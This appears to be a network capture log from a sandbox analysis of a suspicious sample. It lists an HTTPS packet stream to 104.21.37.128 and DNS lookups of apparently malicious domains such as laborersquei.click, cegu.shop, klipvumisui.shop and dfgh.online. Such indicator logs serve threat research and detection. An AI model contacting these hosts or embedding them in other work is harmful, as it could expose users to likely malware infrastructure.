Dec 27, 2024 20:25:20.067389011 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.067397118 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.219022989 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.219042063 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.219115019 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.219122887 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.219172001 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.221702099 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.221715927 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.221769094 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.221774101 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.221817017 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.221826077 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.224771976 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.224786997 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.224847078 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.224853992 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.224893093 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.228496075 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.228511095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.228591919 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.228600979 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.228650093 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.259941101 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.259958982 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.260046005 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.260054111 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.260107040 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.262921095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.262936115 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.262994051 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.263000011 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.263046026 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.266608953 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.266628981 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.266691923 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.266701937 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.266746044 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.269675970 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.269691944 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.269754887 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.269762993 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.269805908 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.420586109 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.420608044 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.420705080 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.420713902 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.420762062 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.423300982 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.423322916 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.423377037 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.423383951 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.423430920 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.423439980 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.426253080 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.426266909 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.426306963 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.426311970 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.426347971 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.426361084 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.429992914 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.430008888 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.430053949 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.430061102 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.430093050 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.430105925 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.464814901 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.464845896 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.464924097 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.464934111 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.464978933 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.467758894 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.467775106 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.467839956 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.467850924 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.467892885 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.471489906 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.471515894 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.471559048 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.471566916 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.471601009 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.471607924 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.474814892 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.474833965 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.474886894 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.474895954 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.474937916 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.621762991 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.621787071 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.621879101 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.621895075 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.621942997 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.624490023 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.624504089 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.624586105 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.624592066 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.624634981 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.627496958 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.627511024 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.627574921 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.627582073 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.627623081 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.631158113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.631171942 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.631231070 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.631237984 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.631278992 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.666448116 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.666471004 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.666562080 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.666573048 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.666620970 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.669867992 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.669883013 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.669933081 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.669939041 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.669975042 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.669981956 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.672827959 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.672846079 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.672903061 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.672914028 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.672956944 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.674350977 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.676558971 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.676575899 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.676621914 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.676628113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.676657915 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.676666021 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.776416063 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.955430031 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.955454111 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.955566883 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.955578089 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.955621004 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.956217051 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.956232071 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.956279993 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.956286907 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.956327915 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.956537962 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.956552029 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.956588030 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.956593037 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.956620932 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.956629992 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.957554102 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.957567930 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.957606077 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.957611084 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.957638979 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.957652092 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.958472967 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.958487988 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.958530903 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.958535910 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.958558083 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.958585024 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.959383965 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.959398031 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.959439993 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.959445000 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.959472895 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.959484100 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.960257053 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.960272074 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.960324049 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.960329056 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.960367918 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.961178064 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.961193085 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.961247921 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.961252928 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:20.961293936 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:20.965514898 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.024379969 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.024398088 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.024492979 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.024518967 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.024564028 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.027374983 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.027388096 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.027451038 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.027456999 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.027497053 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.030555964 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.030571938 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.030639887 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.030651093 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.030697107 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.034157991 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.034183025 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.034234047 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.034240961 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.034271955 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.034284115 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.062395096 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.069235086 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.069253922 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.069370985 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.069377899 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.069437981 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.072283983 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.072302103 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.072341919 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.072348118 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.072376966 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.072391987 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.075999022 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.076018095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.076109886 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.076116085 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.076159954 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.079005003 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.079021931 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.079082012 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.079087973 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.079119921 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.079133987 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.108438969 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.225740910 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.225765944 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.225830078 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.225840092 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.225900888 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.228578091 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.228595018 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.228655100 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.228662014 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.228705883 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.231611967 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.231626987 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.231709003 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.231714964 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.231759071 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.235363007 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.235378027 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.235419035 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.235424042 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.235455036 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.235466957 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.270615101 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.270636082 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.270684958 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.270694017 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.270726919 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.270740986 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.273533106 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.273550987 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.273607969 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.273614883 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.273668051 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.277302980 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.277319908 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.277358055 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.277364969 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.277399063 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.277415991 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.280312061 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.280327082 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.280374050 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.280380964 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.280400038 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.280427933 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.427309036 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.427346945 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.427390099 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.427401066 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.427428007 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.427448988 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.430424929 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.430442095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.430486917 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.430494070 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.430527925 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.430536985 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.433357954 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.433373928 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.433417082 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.433423996 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.433461905 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.437026024 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.437042952 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.437130928 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.437136889 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.437189102 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.472523928 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.472542048 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.472618103 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.472625971 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.472670078 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.475624084 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.475639105 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.475686073 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.475692987 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.475745916 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.476221085 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.476273060 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.476279020 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.476293087 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.476346016 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.506798029 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.506822109 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:21.506855965 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:21.506863117 CET	443	49810	104.21.37.128	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 20:24:04.624326944 CET	59656	53	192.168.2.5	1.1.1.1
Dec 27, 2024 20:24:04.859771013 CET	53	59656	1.1.1.1	192.168.2.5
Dec 27, 2024 20:24:34.755987883 CET	52713	53	192.168.2.5	1.1.1.1
Dec 27, 2024 20:24:34.897790909 CET	53	52713	1.1.1.1	192.168.2.5
Dec 27, 2024 20:24:58.006850958 CET	59419	53	192.168.2.5	1.1.1.1
Dec 27, 2024 20:24:58.144743919 CET	53	59419	1.1.1.1	192.168.2.5
Dec 27, 2024 20:25:00.072391987 CET	56392	53	192.168.2.5	1.1.1.1
Dec 27, 2024 20:25:00.210906029 CET	53	56392	1.1.1.1	192.168.2.5
Dec 27, 2024 20:25:00.739500046 CET	59379	53	192.168.2.5	1.1.1.1
Dec 27, 2024 20:25:00.878155947 CET	53	59379	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 20:24:04.624326944 CET	192.168.2.5	1.1.1.1	0x6c13	Standard query (0)	ArHGNpsPYiljnDdfvwsaosASId.ArHGNpsPYiljnDdfvwsaosASId	A (IP address)	IN (0x0001)	false
Dec 27, 2024 20:24:34.755987883 CET	192.168.2.5	1.1.1.1	0x419e	Standard query (0)	laborersquei.click	A (IP address)	IN (0x0001)	false
Dec 27, 2024 20:24:58.006850958 CET	192.168.2.5	1.1.1.1	0xce44	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false
Dec 27, 2024 20:25:00.072391987 CET	192.168.2.5	1.1.1.1	0x863f	Standard query (0)	klipvumisui.shop	A (IP address)	IN (0x0001)	false
Dec 27, 2024 20:25:00.739500046 CET	192.168.2.5	1.1.1.1	0x5046	Standard query (0)	dfgh.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 20:24:04.859771013 CET	1.1.1.1	192.168.2.5	0x6c13	Name error (3)	ArHGNpsPYiljnDdfvwsaosASId.ArHGNpsPYiljnDdfvwsaosASId	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 20:24:34.897790909 CET	1.1.1.1	192.168.2.5	0x419e	No error (0)	laborersquei.click		104.21.89.250	A (IP address)	IN (0x0001)	false
Dec 27, 2024 20:24:34.897790909 CET	1.1.1.1	192.168.2.5	0x419e	No error (0)	laborersquei.click		172.67.166.49	A (IP address)	IN (0x0001)	false
Dec 27, 2024 20:24:58.144743919 CET	1.1.1.1	192.168.2.5	0xce44	No error (0)	cegu.shop		185.161.251.21	A (IP address)	IN (0x0001)	false
Dec 27, 2024 20:25:00.210906029 CET	1.1.1.1	192.168.2.5	0x863f	No error (0)	klipvumisui.shop		104.21.37.128	A (IP address)	IN (0x0001)	false
